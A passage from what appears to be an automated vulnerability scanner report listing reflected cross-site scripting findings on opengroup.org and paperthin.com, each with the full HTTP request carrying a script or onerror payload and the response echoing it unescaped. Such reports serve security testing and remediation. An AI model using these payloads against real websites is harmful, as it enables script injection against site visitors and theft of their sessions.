Content-Type: text/html
Content-Length: 5143

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/events78a8a<script>alert(1)</script>749c6a7fac/sponsor-exhibit.htm<br>
...[SNIP]...

3.165. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /events/sponsor-exhibit.htm

Request

GET /eventsf6b1d"><script>alert(1)</script>cdbe446a6e7/sponsor-exhibit.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.3.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:04 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5152

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/eventsf6b1d"><script>alert(1)</script>cdbe446a6e7/sponsor-exhibit.htm">
...[SNIP]...

3.166. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /events/sponsor-exhibit.htm

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /events1cf72--><script>alert(1)</script>d544780bb6c/sponsor-exhibit.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.3.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:09 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5155

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /events1cf72--><script>alert(1)</script>d544780bb6c/sponsor-exhibit.htm -->
...[SNIP]...

3.167. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /events/sponsor-exhibit.htm

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /events/sponsor-exhibit.htmf73ce--><script>alert(1)</script>eb1f8baa7f8 HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.3.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:32 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5155

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /events/sponsor-exhibit.htmf73ce--><script>alert(1)</script>eb1f8baa7f8 -->
...[SNIP]...

3.168. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /events/sponsor-exhibit.htm

Request

GET /events/sponsor-exhibit.htm49b7b"><script>alert(1)</script>c9155194fff HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.3.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:25 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5152

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/events/sponsor-exhibit.htm49b7b"><script>alert(1)</script>c9155194fff">
...[SNIP]...

3.169. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /events/sponsor-exhibit.htm

Request

GET /events/sponsor-exhibit.htm1aab5<script>alert(1)</script>2fa9f53bf11 HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.3.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:29 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5146

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/events/sponsor-exhibit.htm1aab5<script>alert(1)</script>2fa9f53bf11<br>
...[SNIP]...

3.170. http://www.opengroup.org/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /favicon.ico

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico60e14--><script>alert(1)</script>e2d1c01bf64 HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.1.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:11 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 4234

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /favicon.ico60e14--><script>alert(1)</script>e2d1c01bf64 -->
...[SNIP]...

3.171. http://www.opengroup.org/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /favicon.ico

Request

GET /favicon.icod03a9<script>alert(1)</script>8588ad7c49d HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.1.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:08 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 4228

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/favicon.icod03a9<script>alert(1)</script>8588ad7c49d<br>
...[SNIP]...

3.172. http://www.opengroup.org/member/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /member/

Request

GET /member9518a"><script>alert(1)</script>7cfc26038a0/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/events/sponsor-exhibit.htm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.4.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:09 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5147

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/member9518a"><script>alert(1)</script>7cfc26038a0/">
...[SNIP]...

3.173. http://www.opengroup.org/member/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /member/

Request

GET /membere150e<script>alert(1)</script>79cf08e9fff/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/events/sponsor-exhibit.htm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.4.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:11 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5141

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/membere150e<script>alert(1)</script>79cf08e9fff/<br>
...[SNIP]...

3.174. http://www.opengroup.org/member/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /member/

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /member55638--><script>alert(1)</script>939d930983d/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/events/sponsor-exhibit.htm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.4.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:14 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5150

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /member55638--><script>alert(1)</script>939d930983d/ -->
...[SNIP]...

3.175. http://www.opengroup.org/togaf/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /togaf/

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /togafd840c--><script>alert(1)</script>b085a6e8f6a/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:49:26 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 4224

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /togafd840c--><script>alert(1)</script>b085a6e8f6a/ -->
...[SNIP]...

3.176. http://www.opengroup.org/togaf/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /togaf/

Request

GET /togaf26e07<script>alert(1)</script>229d277a473/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:49:24 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 4218

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/togaf26e07<script>alert(1)</script>229d277a473/<br>
...[SNIP]...

3.177. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /togaf9/cert/

Request

GET /togaf977a7d"><script>alert(1)</script>5d373802e00/cert/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/togaf/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.1.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:55 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5122

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/togaf977a7d"><script>alert(1)</script>5d373802e00/cert/">
...[SNIP]...

3.178. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /togaf9/cert/

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /togaf99edeb--><script>alert(1)</script>120de7a4391/cert/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/togaf/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.1.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:00 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5125

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /togaf99edeb--><script>alert(1)</script>120de7a4391/cert/ -->
...[SNIP]...

3.179. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /togaf9/cert/

Request

GET /togaf94fa9b<script>alert(1)</script>23835d6a4f/cert/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/togaf/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.1.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:57 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5113

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/togaf94fa9b<script>alert(1)</script>23835d6a4f/cert/<br>
...[SNIP]...

3.180. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /togaf9/cert/

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /togaf9/certa8972--><script>alert(1)</script>2670c9f9ea1/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/togaf/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.1.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:18 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5125

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /togaf9/certa8972--><script>alert(1)</script>2670c9f9ea1/ -->
...[SNIP]...

3.181. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /togaf9/cert/

Request

GET /togaf9/cert296c2"><script>alert(1)</script>a8f2df5e418/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/togaf/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.1.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:09 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5122

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/togaf9/cert296c2"><script>alert(1)</script>a8f2df5e418/">
...[SNIP]...

3.182. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /togaf9/cert/

Request

GET /togaf9/certe1cf2<script>alert(1)</script>e0cfa26c479/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/togaf/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.1.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:15 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5116

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/togaf9/certe1cf2<script>alert(1)</script>e0cfa26c479/<br>
...[SNIP]...

3.183. http://www.paperthin.com/_cs_apps/ajaxProxy.cfm [bean parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperthin.com
Path:   /_cs_apps/ajaxProxy.cfm

Request

GET /_cs_apps/ajaxProxy.cfm?bean=twitterService7e534<img%20src%3da%20onerror%3dalert(1)>39d24d73cff&method=buildUtilityTweetHTML&searchString=commonspot HTTP/1.1
Host: www.paperthin.com
Proxy-Connection: keep-alive
Referer: http://www.paperthin.com/products/pricing-options.cfm
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=2258135; CFTOKEN=51840065; __utmz=259978379.1298762761.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); sifrFetch=true; MTCCK=1; __utma=259978379.1159283661.1298762761.1298762761.1298762761.1; __utmc=259978379; __utmb=259978379.3.10.1298762761

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:16:29 GMT
Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13
Pragma: no-cache
Expires: {ts '2011-02-26 18:16:29'}
Content-Type: text/html; charset=UTF-8
Content-Length: 1638


           <script type="text/javascript" src="/ADF/thirdParty/jquery/jquery-1.3.2.js"></script>
           
           
   <!-- ADF Lightbox Framework Loaded @ {ts '2011-02-26 18:16:29'} -->
   <script type='text/javascript' s
...[SNIP]...
</script>
   The Bean: twitterService7e534<img src=a onerror=alert(1)>39d24d73cff with method: buildUtilityTweetHTML is not accessible remotely via Ajax Proxy.

3.184. http://www.paperthin.com/_cs_apps/ajaxProxy.cfm [method parameter]

Summary

Severity:   High
Confidence:   Certain
